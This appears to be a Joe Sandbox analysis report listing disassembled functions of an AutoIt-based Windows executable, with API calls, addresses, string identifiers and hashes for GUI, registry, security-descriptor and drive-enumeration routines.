                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                • String ID: $AutoIt v3$DISPLAY$static
                • API String ID: 2211948467-2373415609
                • Opcode ID: a3ac0ffe90b41f1fc4b545b1854b2d9a9ff9534638311c77c29a98676cc99234
                • Instruction ID: f3d1194894cd8df4730f5808d59575642fc0b00591516015eafe784f174be92f
                • Opcode Fuzzy Hash: a3ac0ffe90b41f1fc4b545b1854b2d9a9ff9534638311c77c29a98676cc99234
                • Instruction Fuzzy Hash: 9C026B71A00205EFDB14DFA4DC89EAE7BB9FF49710F048158F915AB2A1DB74AD41CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                Download Yara Rule
                APIs
                • SetTextColor.GDI32(?,00000000), ref: 001A712F
                • GetSysColorBrush.USER32(0000000F), ref: 001A7160
                • GetSysColor.USER32(0000000F), ref: 001A716C
                • SetBkColor.GDI32(?,000000FF), ref: 001A7186
                • SelectObject.GDI32(?,?), ref: 001A7195
                • InflateRect.USER32(?,000000FF,000000FF), ref: 001A71C0
                • GetSysColor.USER32(00000010), ref: 001A71C8
                • CreateSolidBrush.GDI32(00000000), ref: 001A71CF
                • FrameRect.USER32(?,?,00000000), ref: 001A71DE
                • DeleteObject.GDI32(00000000), ref: 001A71E5
                • InflateRect.USER32(?,000000FE,000000FE), ref: 001A7230
                • FillRect.USER32(?,?,?), ref: 001A7262
                • GetWindowLongW.USER32(?,000000F0), ref: 001A7284
                  • Part of subcall function 001A73E8: GetSysColor.USER32(00000012), ref: 001A7421
                  • Part of subcall function 001A73E8: SetTextColor.GDI32(?,?), ref: 001A7425
                  • Part of subcall function 001A73E8: GetSysColorBrush.USER32(0000000F), ref: 001A743B
                  • Part of subcall function 001A73E8: GetSysColor.USER32(0000000F), ref: 001A7446
                  • Part of subcall function 001A73E8: GetSysColor.USER32(00000011), ref: 001A7463
                  • Part of subcall function 001A73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 001A7471
                  • Part of subcall function 001A73E8: SelectObject.GDI32(?,00000000), ref: 001A7482
                  • Part of subcall function 001A73E8: SetBkColor.GDI32(?,00000000), ref: 001A748B
                  • Part of subcall function 001A73E8: SelectObject.GDI32(?,?), ref: 001A7498
                  • Part of subcall function 001A73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 001A74B7
                  • Part of subcall function 001A73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001A74CE
                  • Part of subcall function 001A73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 001A74DB
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                • String ID:
                • API String ID: 4124339563-0
                • Opcode ID: 3c9634a1fed6c30f5bfe635d6dcfcbf2b1de6035907515534fe02f588added83
                • Instruction ID: 4398c18a174e61ae42e79a2f34b0a4233c9258aa25fdb54113133871d5b0f59d
                • Opcode Fuzzy Hash: 3c9634a1fed6c30f5bfe635d6dcfcbf2b1de6035907515534fe02f588added83
                • Instruction Fuzzy Hash: C8A19076508301EFDB119F60DC48E6BBBE9FF8A321F100A19F962961E1D771E984CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00192711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                Download Yara Rule
                APIs
                • DestroyWindow.USER32(00000000), ref: 0019273E
                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0019286A
                • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 001928A9
                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 001928B9
                • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00192900
                • GetClientRect.USER32(00000000,?), ref: 0019290C
                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00192955
                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00192964
                • GetStockObject.GDI32(00000011), ref: 00192974
                • SelectObject.GDI32(00000000,00000000), ref: 00192978
                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00192988
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00192991
                • DeleteDC.GDI32(00000000), ref: 0019299A
                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 001929C6
                • SendMessageW.USER32(00000030,00000000,00000001), ref: 001929DD
                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00192A1D
                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00192A31
                • SendMessageW.USER32(00000404,00000001,00000000), ref: 00192A42
                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00192A77
                • GetStockObject.GDI32(00000011), ref: 00192A82
                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00192A8D
                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00192A97
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                • API String ID: 2910397461-517079104
                • Opcode ID: 5337f2d148b2946f96f1b9ba64dc3ac41f71c3f93a4bd6b25404a8e3200db330
                • Instruction ID: 3eef70d26490da7e379c8f17a623ef64cb41f570f1ec80f5886ab3fb9a3b4cac
                • Opcode Fuzzy Hash: 5337f2d148b2946f96f1b9ba64dc3ac41f71c3f93a4bd6b25404a8e3200db330
                • Instruction Fuzzy Hash: C7B13AB5A00215BFEB14DFA8DC89FAE7BA9FB09710F004515F915EB690D774AD80CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00184ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                Download Yara Rule
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 00184AED
                • GetDriveTypeW.KERNEL32(?,001ACB68,?,\\.\,001ACC08), ref: 00184BCA
                • SetErrorMode.KERNEL32(00000000,001ACB68,?,\\.\,001ACC08), ref: 00184D36
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ErrorMode$DriveType
                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                • API String ID: 2907320926-4222207086
                • Opcode ID: e11c9b2ca0870c9db24b3556c58496104bf868c9102e225e8b4da8e602eaa501
                • Instruction ID: f364981ca12a6e625bf8ae6b24481920264f88691d931daaa5a9ae4f973d5b89
                • Opcode Fuzzy Hash: e11c9b2ca0870c9db24b3556c58496104bf868c9102e225e8b4da8e602eaa501
                • Instruction Fuzzy Hash: 0561C0307056079BCB08FF64DA819A8B7B5AB15340B248026F846AB791DF76EF81DF81
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                Download Yara Rule
                APIs
                • GetSysColor.USER32(00000012), ref: 001A7421
                • SetTextColor.GDI32(?,?), ref: 001A7425
                • GetSysColorBrush.USER32(0000000F), ref: 001A743B
                • GetSysColor.USER32(0000000F), ref: 001A7446
                • CreateSolidBrush.GDI32(?), ref: 001A744B
                • GetSysColor.USER32(00000011), ref: 001A7463
                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 001A7471
                • SelectObject.GDI32(?,00000000), ref: 001A7482
                • SetBkColor.GDI32(?,00000000), ref: 001A748B
                • SelectObject.GDI32(?,?), ref: 001A7498
                • InflateRect.USER32(?,000000FF,000000FF), ref: 001A74B7
                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001A74CE
                • GetWindowLongW.USER32(00000000,000000F0), ref: 001A74DB
                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001A752A
                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 001A7554
                • InflateRect.USER32(?,000000FD,000000FD), ref: 001A7572
                • DrawFocusRect.USER32(?,?), ref: 001A757D
                • GetSysColor.USER32(00000011), ref: 001A758E
                • SetTextColor.GDI32(?,00000000), ref: 001A7596
                • DrawTextW.USER32(?,001A70F5,000000FF,?,00000000), ref: 001A75A8
                • SelectObject.GDI32(?,?), ref: 001A75BF
                • DeleteObject.GDI32(?), ref: 001A75CA
                • SelectObject.GDI32(?,?), ref: 001A75D0
                • DeleteObject.GDI32(?), ref: 001A75D5
                • SetTextColor.GDI32(?,?), ref: 001A75DB
                • SetBkColor.GDI32(?,?), ref: 001A75E5
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                • String ID:
                • API String ID: 1996641542-0
                • Opcode ID: 3dc5dbc678e8cb1695014a3b59b30e3441de5976f36edb38627b1c3e6cb2ee74
                • Instruction ID: b5b845e8c2f5b64827b6910d0e03bbecd40caaae1aa9366195c82b656863ce3e
                • Opcode Fuzzy Hash: 3dc5dbc678e8cb1695014a3b59b30e3441de5976f36edb38627b1c3e6cb2ee74
                • Instruction Fuzzy Hash: 6D614F76D04218AFDF019FA4DC49AEE7FB9EB0A320F114125F915AB2E1D7749A80CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                Download Yara Rule
                APIs
                • GetCursorPos.USER32(?), ref: 001A1128
                • GetDesktopWindow.USER32 ref: 001A113D
                • GetWindowRect.USER32(00000000), ref: 001A1144
                • GetWindowLongW.USER32(?,000000F0), ref: 001A1199
                • DestroyWindow.USER32(?), ref: 001A11B9
                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 001A11ED
                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001A120B
                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 001A121D
                • SendMessageW.USER32(00000000,00000421,?,?), ref: 001A1232
                • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 001A1245
                • IsWindowVisible.USER32(00000000), ref: 001A12A1
                • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 001A12BC
                • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 001A12D0
                • GetWindowRect.USER32(00000000,?), ref: 001A12E8
                • MonitorFromPoint.USER32(?,?,00000002), ref: 001A130E
                • GetMonitorInfoW.USER32(00000000,?), ref: 001A1328
                • CopyRect.USER32(?,?), ref: 001A133F
                • SendMessageW.USER32(00000000,00000412,00000000), ref: 001A13AA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                • String ID: ($0$tooltips_class32
                • API String ID: 698492251-4156429822
                • Opcode ID: fe97211e21dfd9701789420ffeb0131c8d2d3d44dcb49d7bb93f3d161d6c2aa3
                • Instruction ID: 50327d96779d61c85131bc100b027c8b56b637c47ef1161dc80804d18c71443b
                • Opcode Fuzzy Hash: fe97211e21dfd9701789420ffeb0131c8d2d3d44dcb49d7bb93f3d161d6c2aa3
                • Instruction Fuzzy Hash: BDB19D75608341AFDB04DF64C984BABBBE5FF89350F00891DF9999B2A1D731E884CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A0241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                Download Yara Rule
                APIs
                • CharUpperBuffW.USER32(?,?), ref: 001A02E5
                • _wcslen.LIBCMT ref: 001A031F
                • _wcslen.LIBCMT ref: 001A0389
                • _wcslen.LIBCMT ref: 001A03F1
                • _wcslen.LIBCMT ref: 001A0475
                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 001A04C5
                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001A0504
                  • Part of subcall function 0012F9F2: _wcslen.LIBCMT ref: 0012F9FD
                  • Part of subcall function 0017223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00172258
                  • Part of subcall function 0017223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0017228A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _wcslen$MessageSend$BuffCharUpper
                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                • API String ID: 1103490817-719923060
                • Opcode ID: 58329e88f3c907a76e4a6c7cd70d223e8c67d59759636a8b4370c29bbb55d787
                • Instruction ID: 4acba31ebd023780c4cc1d396365374d029db992bafddbda1d6514e154e41736
                • Opcode Fuzzy Hash: 58329e88f3c907a76e4a6c7cd70d223e8c67d59759636a8b4370c29bbb55d787
                • Instruction Fuzzy Hash: 65E1B3352083018FCB19DF24C55096AB7E6BF9D318F54496DF8969B3A1DB30ED86CB81
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00128891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                Download Yara Rule
                APIs
                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00128968
                • GetSystemMetrics.USER32(00000007), ref: 00128970
                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0012899B
                • GetSystemMetrics.USER32(00000008), ref: 001289A3
                • GetSystemMetrics.USER32(00000004), ref: 001289C8
                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 001289E5
                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 001289F5
                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00128A28
                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00128A3C
                • GetClientRect.USER32(00000000,000000FF), ref: 00128A5A
                • GetStockObject.GDI32(00000011), ref: 00128A76
                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00128A81
                  • Part of subcall function 0012912D: GetCursorPos.USER32(?), ref: 00129141
                  • Part of subcall function 0012912D: ScreenToClient.USER32(00000000,?), ref: 0012915E
                  • Part of subcall function 0012912D: GetAsyncKeyState.USER32(00000001), ref: 00129183
                  • Part of subcall function 0012912D: GetAsyncKeyState.USER32(00000002), ref: 0012919D
                • SetTimer.USER32(00000000,00000000,00000028,001290FC), ref: 00128AA8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                • String ID: AutoIt v3 GUI
                • API String ID: 1458621304-248962490
                • Opcode ID: eb53ae6da7a2307a9e40135d5a623470ae52853f4d0a24d726b04a1b61c6030e
                • Instruction ID: 9bb24ba6ee48078e863b3bbdb4b394b1fef5ff3982307ee44b0a809147c82ac4
                • Opcode Fuzzy Hash: eb53ae6da7a2307a9e40135d5a623470ae52853f4d0a24d726b04a1b61c6030e
                • Instruction Fuzzy Hash: C0B18E75A00219AFDF14DFA8DD85BAE7BB5FB48314F114129FA15AB290DB34E890CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00170D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 001710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00171114
                  • Part of subcall function 001710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00170B9B,?,?,?), ref: 00171120
                  • Part of subcall function 001710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00170B9B,?,?,?), ref: 0017112F
                  • Part of subcall function 001710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00170B9B,?,?,?), ref: 00171136
                  • Part of subcall function 001710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0017114D
                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00170DF5
                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00170E29
                • GetLengthSid.ADVAPI32(?), ref: 00170E40
                • GetAce.ADVAPI32(?,00000000,?), ref: 00170E7A
                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00170E96
                • GetLengthSid.ADVAPI32(?), ref: 00170EAD
                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00170EB5
                • HeapAlloc.KERNEL32(00000000), ref: 00170EBC
                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00170EDD
                • CopySid.ADVAPI32(00000000), ref: 00170EE4
                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00170F13
                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00170F35
                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00170F47
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00170F6E
                • HeapFree.KERNEL32(00000000), ref: 00170F75
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00170F7E
                • HeapFree.KERNEL32(00000000), ref: 00170F85
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00170F8E
                • HeapFree.KERNEL32(00000000), ref: 00170F95
                • GetProcessHeap.KERNEL32(00000000,?), ref: 00170FA1
                • HeapFree.KERNEL32(00000000), ref: 00170FA8
                  • Part of subcall function 00171193: GetProcessHeap.KERNEL32(00000008,00170BB1,?,00000000,?,00170BB1,?), ref: 001711A1
                  • Part of subcall function 00171193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00170BB1,?), ref: 001711A8
                  • Part of subcall function 00171193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00170BB1,?), ref: 001711B7
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                • String ID:
                • API String ID: 4175595110-0
                • Opcode ID: 072cdd64f55bd3ab3beabb6f904de7e23bb0121de622da403df3a564fe2631b0
                • Instruction ID: 08623bc3e4eb80fcba04d4420ad9898817f48e4d9f4ca2726bfcaf90a4eae3e1
                • Opcode Fuzzy Hash: 072cdd64f55bd3ab3beabb6f904de7e23bb0121de622da403df3a564fe2631b0
                • Instruction Fuzzy Hash: 78713B72A0030AEBDF21DFA4DC45FAEBBB8BF09310F148115F919E6191DB719A45CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0019C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                Download Yara Rule
                APIs
                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0019C4BD
                • RegCreateKeyExW.ADVAPI32(?,?,00000000,001ACC08,00000000,?,00000000,?,?), ref: 0019C544
                • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0019C5A4
                • _wcslen.LIBCMT ref: 0019C5F4
                • _wcslen.LIBCMT ref: 0019C66F
                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0019C6B2
                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0019C7C1
                • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0019C84D
                • RegCloseKey.ADVAPI32(?), ref: 0019C881
                • RegCloseKey.ADVAPI32(00000000), ref: 0019C88E
                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0019C960
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                • API String ID: 9721498-966354055
                • Opcode ID: a5bae9eb5c85a215f7ade04282c3c0e629cbb3129ea698fe6efa166f01b09458
                • Instruction ID: 466b921059310b2f281c4a031f484545ff7beaab43bdda145f18381a4c8c1b6d
                • Opcode Fuzzy Hash: a5bae9eb5c85a215f7ade04282c3c0e629cbb3129ea698fe6efa166f01b09458
                • Instruction Fuzzy Hash: 6B1269356042019FDB18DF14D891A6AB7E5FF88714F05886DF89A9B3A2DB31FD81CB81
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                Download Yara Rule
                APIs
                • CharUpperBuffW.USER32(?,?), ref: 001A09C6
                • _wcslen.LIBCMT ref: 001A0A01
                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001A0A54
                • _wcslen.LIBCMT ref: 001A0A8A
                • _wcslen.LIBCMT ref: 001A0B06
                • _wcslen.LIBCMT ref: 001A0B81
                  • Part of subcall function 0012F9F2: _wcslen.LIBCMT ref: 0012F9FD
                  • Part of subcall function 00172BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00172BFA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _wcslen$MessageSend$BuffCharUpper
                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                • API String ID: 1103490817-4258414348
                • Opcode ID: 343667f9421a7defbc894f685f2d6c24b2c5c8710dd4873171b91b1425532640
                • Instruction ID: 4c255894d335385a19d34bcf906079075f3ec8a24979fb73a829bd217345872d
                • Opcode Fuzzy Hash: 343667f9421a7defbc894f685f2d6c24b2c5c8710dd4873171b91b1425532640
